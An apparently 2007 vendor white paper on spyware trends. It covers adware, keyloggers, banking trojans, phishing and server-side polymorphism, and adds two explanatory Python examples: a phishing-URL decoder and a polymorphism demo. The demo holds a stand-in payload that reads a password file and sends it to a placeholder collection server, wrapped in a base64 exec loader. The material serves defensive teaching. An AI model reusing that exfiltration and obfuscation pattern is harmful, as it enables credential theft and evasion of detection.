22 August 07
The Latest Trends in Spyware
Spyware is among the more insidious computer security threats. Organizations must guard against spyware and similar malicious software or risk loss of sensitive corporate data; diminished performance of desktops, servers, and networks; wasted bandwidth; lost business and angry customers; and legal liability.
What exactly is spyware? The CA Security Advisor Glossary defines it as "any application that employs a user's network connection in the background without their permission or knowledge, and gathers or transmits information on the user or their behavior."[1] Many spyware applications collect referrer data (the URL of the page the user's browser came from), the IP address, and system information such as time of visit, browser type, operating system and platform, and CPU speed, the glossary says. The security industry also uses a broader definition of spyware: "any software that is installed without obtaining user permission and awareness."
Spyware can secretly record personal information through multiple techniques including logging keystrokes, recording web browsing history and scanning documents on a computer's hard drive, according to the online encyclopedia Wikipedia. In fact, one of the biggest problems with spyware is that some programs are capable of gathering personal information, including user logons and passwords, logs of website visits, and online search strings. This can lead to other problems such as identity theft, which in turn can result in legal action, fines from failing to comply with regulations and privacy laws, and bad publicity.
Theft of personal data can also give criminals access to vital business information such as customer records, product development histories, and intellectual property. This white paper explores some of the latest trends with spyware, including the changing motivations of spyware writers, emerging forms of the software, and steps organizations can take to protect themselves.
A Significant Threat
Spyware is a real and serious threat to organizations as well as individual computer users. The 2006 Global Security Survey of chief security officers and chief information security officers by Deloitte Touche Tohmatsu showed that 48 percent of the executives said their organization had experienced external breaches involving spyware.[2] Only viruses/worms (63 percent) and phishing/pharming (51 percent) were cited more frequently. Other types of incidents, such as social engineering, hacking, denial of service, web application breaches, and wireless network breaches, were considerably less common, according to the survey.
Under that broad definition, spyware takes several forms, adware among them. The CA Security Advisor Glossary defines adware as software that displays pop-up or pop-under advertisements when the primary user interface is not visible.[3] It is the most prevalent type of spyware, accounting for 45 percent of known spyware threats in 2006, according to the CA 2007 Security Outlook Report. Adware is generally used to push advertising at users based on the types of websites they have visited.
Another type of spyware is a keylogger, which the CA Security Advisor Glossary defines as a software program that surreptitiously records keystrokes and then makes the log of keyboard activity available to someone other than the logged-on user.[4] Keyloggers are common in trojans and sometimes appear in virus payloads. They are also sold commercially, and commercial keyloggers are sometimes installed surreptitiously to spy on unwitting users. Once a keylogger is installed, everything typed at the keyboard is at risk, including passwords, account numbers, and other personally identifiable information.
Spyware also appears in the form of backdoors. According to the CA glossary, these are programs that surreptitiously allow access to a computer's files and other resources through a network connection.[5] An intruder who has compromised a machine, for example by exploiting a software vulnerability, can install one of these programs to keep the machine open to future access.
"Virtually any type of software can have a spyware component," says Benjamin Googins, senior research engineer at CA. "For example, toolbars are not always classified as spyware, but many of the ones detected by CA Anti-Spyware covertly collect user data, like search queries entered in other search boxes."
Michael Johnson, research engineer at CA, says there are many ways that seemingly innocuous software can be malicious. "To the average user, what the software is doing is only what the user can see," Johnson says. He says 'behind the scenes' software can be used to perform numerous malicious activities. Software that appears harmless can be reconfigured to become malicious later, Johnson says. "Some toolbars contain malicious capability in the code such as changing your start page, and automatic updating without the ability to turn it off," he says.
What's especially dangerous about spyware is that it can be installed on a device without the user knowing about it. Programs can infiltrate a computer when a user visits a particular website, shares files with coworkers or business partners, or downloads free software such as a screen saver. Once spyware is on a computer it can be hard to remove.
In general, the motivation behind malware has changed, says Googins. "In the past, malware authors - groups or individuals - were content with rewards like glory, proving computer savvy among peers, and notoriety," he says. This motivation has not gone away, he says, but there has been an explosion in financially motivated attacks.
The latest trends in unwanted programs are directly reflected in the change in motivation from notoriety to financial gain, Googins says. "There has been a drive toward 'silent' programs, or those programs that go unnoticed for extended periods of time, allowing them to covertly collect personal information to then be used for financial gain," he says. This software, which Googins says is commonly labeled a trojan, leaves the host system running normally. It causes no visible damage but quietly spies on the user.
The financial motivation has also led to the growth of "noisy" spyware software such as adware, toolbars, and hijackers. "With adware, the purpose is to show ads to the user while hiding the fact that the ads are initiated by the resident software, possibly hoping to confuse users into believing the ads are derived from the websites they are visiting," Googins says. "To the average user, the difference between ads triggered by a website or software resident on their system is indistinguishable, so infected users are often unaware of it."
There have been a number of legal and government actions against companies that use adware, Googins says. For example, the New York State attorney general's office went after several companies for using adware created by a company called Direct Revenue. The state in January 2007 reached a settlement with three companies, Travelocity.com LP, Cingular Wireless LLC, and Priceline.com Inc., in which the companies agreed they would not use adware that's covertly installed.[6]
The settlement required that each company deliver online ads only through companies that provide to consumers full disclosure of the name of the applicable adware program and any bundled software; brand each advertisement with a prominent and easily identifiable brand name or icon; fully describe the adware and obtain consumer consent to both download and run the adware; make it practicable for consumers to remove the adware from their computers; obtain consent to continue serving ads to legacy users; and require their affiliates to meet all of these same requirements. The companies also must investigate, prior to contracting with a company to deliver online ads, how the ads are delivered.
Pursuing companies that use adware is a new development, Googins says. "In the past, the creators of adware were the target of legal and governmental challenges," he says. "Going after the advertisers puts pressure on them to be responsible in what methods they choose to display ads to users. In the coming year we may see more companies re-evaluating their use of adware as a means to advertise."
Another, more recent development is the use of the "blended threat" by malware authors, according to Googins. Also related to the trend toward financially motivated attacks, this involves a mixture of techniques and software, he says.
In addition, over the last few years the CA Security Advisor team has seen a rise in the number of what security experts commonly call "rogue security products," Googins says. As Internet use has grown, "so have the number of security-related issues that users have to contend with," he says. "Opportunistic malware authors seem to be playing off user security fears by pushing useless products that generally have a pretty user interface, but nothing 'under the hood.' In other words, they look good but offer no security value."
Oftentimes these programs are installed by trojan downloaders and auto-run when the user starts his system, Googins says. They are programmed to report erroneous security problems, he says, often with messages that compel the user to buy a solution to remove the "threat."
Googins says CA detects "whole families of spyware that are intent on stealing financial data, like bank login information." For example, the Win32/Bancos family includes many varied trojans, which attempt to steal sensitive information that can be used to gain unauthorized access to bank accounts via Internet banking, according to CA's Virus Information Center.[7] Most variants target Brazilian banks. There are more than 2,000 distinct variants of this trojan, with more being discovered every day, the center reports.
Another example is the Phishbank family.[8] According to the CA Virus Information Center, this family includes HTML web pages and email messages that attempt to lure people to phishing pages, "using obfuscated URLs intended to obscure the page's true location and intent." The obscured URLs are intended to be an aid in creating a believable forgery of a real web page such as an online banking page, the center says. "The forged page can then entice users to enter confidential information, which can be captured by the forger."
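The obfuscated URLs the Phishbank description refers to usually rely on how browsers parse an address rather than on anything exotic: a legitimate-looking hostname placed in the userinfo part before an "@", percent-encoded characters in the hostname, or an IP address written as one decimal number. The Python below is an added example written for this page (it is not code from CA or from the original white paper) that recovers the host a browser would actually connect to and compares it against the bank's real hostname. The hostname www.bank.example.com, the address 203.0.113.5 and the sample URLs are constructed for illustration.

```python
import ipaddress
from urllib.parse import unquote, urlsplit

# Constructed: the bank's genuine login host (hypothetical example name).
LEGIT_HOSTS = {"www.bank.example.com"}


def true_host(url: str) -> str:
    """Return the host a browser would actually connect to.

    urlsplit().hostname already discards the userinfo part before '@'
    and any port, and lowercases the result.  On top of that we undo
    percent-encoding and expand an all-decimal host such as 3405803781
    into dotted form.  (Hex or octal IP spellings are not handled here.)
    """
    host = urlsplit(url).hostname or ""
    host = unquote(host)
    if host.isdigit():
        # A single decimal number is accepted by browsers as an IPv4 address.
        host = str(ipaddress.IPv4Address(int(host)))
    return host


def classify(url: str, legit_hosts=LEGIT_HOSTS) -> dict:
    """Report the real destination and flag a lookalike: the legitimate
    name appears somewhere in the (decoded) URL but is not the host."""
    host = true_host(url)
    legit = host in legit_hosts
    looks_like = any(h in unquote(url).lower() for h in legit_hosts)
    return {"host": host, "legitimate": legit,
            "lookalike": (not legit) and looks_like}


if __name__ == "__main__":
    # Constructed sample URLs; 203.0.113.5 is a documentation-range address.
    samples = [
        "https://www.bank.example.com/login",
        "http://www.bank.example.com@203.0.113.5/login",
        "http://www.bank.example.com:login@3405803781/",
        "http://%77%77%77.bank.example.com.evil.example/login",
    ]
    for u in samples:
        print(u, "->", classify(u))
```

The second and third samples both land on 203.0.113.5 even though the bank's name is the most visible part of the address; the fourth decodes to a subdomain of an unrelated registrable domain. A mail or proxy filter that only string-matches the bank's name against the raw URL would pass all four.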
A new trend is server-side polymorphism, Googins says. "In other words, the server where the malware is distributed actually has the capability of obfuscating code so that it is not easily detected by security products," he says. According to CA's Security Advisor Research Blog of March 8, 2007, "we are expecting a further increase in the number of malware authors using more traditional methods of distribution and other functionality (such as stealth in the form of polymorphism and rootkits)."
Security experts are seeing "lots of software that changes its file names, locations and contents to hide itself," says Johnson. "Much software changes on the server instead of the client's machine," he says. The software updates itself into malicious software, even though when first installed on the client's machine it was innocuous, Johnson says.
Building a Defense
CA was a founding member of the Anti-Spyware Coalition in 2005, Googins says. "CA has played an active role by contributing to the Anti-Spyware Coalition, including the conflict resolution guidelines, risk criteria, and best practices," he says. CA has also been actively involved in helping to establish software standards related to unwanted software.
"CA has set its own standards for software developers through its Spyware Scorecard," Googins says. The first version of the Anti-Spyware Scorecard was published in December 2003, creating the first published standards for software behavior, according to Googins. He says that eventually helped lead to the creation of industry-wide standards.
There is much that organizations can do to protect themselves against spyware and other malware, both from a policy and technology standpoint. "Organizations should employ a range of practices that cover everything from the gateway to endpoints on the network, to effectively address the wide range of threats," Googins says.
An element of dealing with the threat of spyware is educating all computer users in the organization about spyware: what it is, how it gets installed, what it is capable of doing, and what to do if they suspect they have it. That can include training on how to spot suspicious activity and avoid questionable websites, staying away from software bundles, not opening attachments from unknown senders, keeping systems updated with the latest security patches, and so on. Googins says, "The reality, though, is that training employees can be costly and at times not very effective. A system administrator needs to take a comprehensive approach to securing the network. Anti-virus and anti-spyware products can identify software-based threats residing on the user's machine by utilizing signature-based technology. Another component of a comprehensive security plan involves the use of a firewall to protect against spyware. Firewalls nicely complement anti-virus and anti-spyware products by adding a layer of protection that identifies potential threats through a behavior and general software characteristic identification method. In addition to deploying a firewall at the gateway, which is common practice today, one can now deploy network and application firewall functionality to each host using CA's HIPS technology. HIPS technology provides proactive protection against unknown threats which nicely complements anti-virus and anti-spyware technologies."
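The server-side polymorphism Googins and Johnson describe earlier and the contrast drawn in the paragraph above between signature-based scanning and behavior-oriented protection come down to the same mechanism: a server that re-wraps the payload for every download gives each copy a new hash, so an exact signature written against one copy misses the next, while a check that first unwraps the sample and then looks at what the code does still matches. The Python below is an added illustration written for this page, not CA's detection logic and not real malware. The "payload" is a constructed two-line stand-in that is never executed; the wrapper (junk comment, random variable name, one base64 layer) is a simplified stand-in for what a polymorphic distribution server does; `unwrapped_rule_hit` is a content rule applied after unwrapping, a stand-in for behavior-oriented logic rather than runtime monitoring; and all function names are the example's own.

```python
import base64
import hashlib
import random
import string

# Constructed stand-in for a spyware payload: reads a stored-password
# file and posts it to a collection server.  Never executed here.
PAYLOAD = (
    "data = open('passwords.txt').read()\n"
    "send('http://collector.example.net/upload', data)\n"
)


def serve_variant(payload: str, seed: int) -> str:
    """Emulate a distribution server that re-wraps the same payload for
    every download: fresh junk preamble, random variable name and one
    base64 layer, so each copy has a different hash."""
    rng = random.Random(seed)
    junk = "".join(rng.choice(string.ascii_letters)
                   for _ in range(rng.randint(8, 32)))
    var = "".join(rng.choice(string.ascii_lowercase)
                  for _ in range(rng.randint(4, 9)))
    blob = base64.b64encode(payload.encode()).decode()
    return (f"# {junk}\n"
            f"{var} = '{blob}'\n"
            f"exec(__import__('base64').b64decode({var}))\n")


def sha256(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def hash_signature_hit(sample: str, known_hashes: set) -> bool:
    """Classic exact-hash signature: matches only the copy it was made from."""
    return sha256(sample) in known_hashes


def normalise(sample: str) -> str:
    """Strip junk comment lines and peel one base64 layer if present,
    returning the code that would actually run."""
    lines = [l for l in sample.splitlines() if not l.startswith("#")]
    for line in lines:
        if "= '" in line and line.endswith("'"):
            blob = line.split("= '", 1)[1][:-1]
            try:
                return base64.b64decode(blob, validate=True).decode()
            except (ValueError, UnicodeDecodeError):
                pass
    return "\n".join(lines)


def unwrapped_rule_hit(sample: str) -> bool:
    """Rule on what the unwrapped code does: reads a credential file
    AND sends data out.  Indifferent to the wrapper's bytes."""
    text = normalise(sample)
    return "passwords.txt" in text and "send(" in text


if __name__ == "__main__":
    first = serve_variant(PAYLOAD, 1)       # what the first visitor got
    second = serve_variant(PAYLOAD, 2)      # what the next visitor got
    known = {sha256(first)}                 # signature built from the first copy
    print("same hash? ", sha256(first) == sha256(second))
    print("hash signature on 2nd copy:", hash_signature_hit(second, known))
    print("unwrapped rule on 2nd copy:", unwrapped_rule_hit(second))
```

Real polymorphic servers vary far more than a comment and a variable name, and real engines unwrap far more than one base64 layer, but the asymmetry is the same: every layer the server adds costs the defender an exact signature, while a rule anchored on the unwrapped behavior survives the re-wrapping.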
In addition to commercial security offerings, there are free products available that can remove a variety of unwanted software, Googins says. "The problem is that these programs typically are not as up to date as commercially produced products that have a full-time staff dedicated to identifying threats," he says. "Unwanted software changes rapidly, and for a security product to be relevant it must have people actively updating it as threats emerge in a timely fashion."
Indications are that these threats will continue to emerge. "Given the apparent intent and functionality of spyware today, the risks of spyware should be taken seriously by businesses," Googins says.
[1] "Spyware," CA Security Advisor Glossary, http://www.totaldefense.com/support/security-advisor/glossary.aspx#S
[2] "Global Security Survey," Deloitte Touche Tohmatsu, 2006, http://www.deloitte.com/dtt/research/0,1015,sid%253D54002%2526cid%253D124927,00.html#survey
[3] "Adware," CA Security Advisor Glossary, http://www.totaldefense.com/support/security-advisor/glossary.aspx#A
[4] "Key Logger," CA Security Advisor Glossary, http://www.totaldefense.com/support/security-advisor/glossary.aspx#K
[5] "Backdoor," CA Security Advisor Glossary, http://www.totaldefense.com/support/security-advisor/glossary.aspx#B
[6] "Groundbreaking Settlements Hold Online Advertisers Responsible for Displaying Ads through Deceptively Installed 'Adware' Programs," Office of the New York State Attorney General, January 2007, http://www.oag.state.ny.us/press/2007/jan/jan29b_07.html
[7] "Bancos," CA Virus Information Center, http://www.ca.com/securityadvisor/virusinfo/virus.aspx?id=53476
[8] "Latest Phishing Scams," CA Virus Information Center, http://gsa.ca.com/virusinfo/virus.aspx?id=38328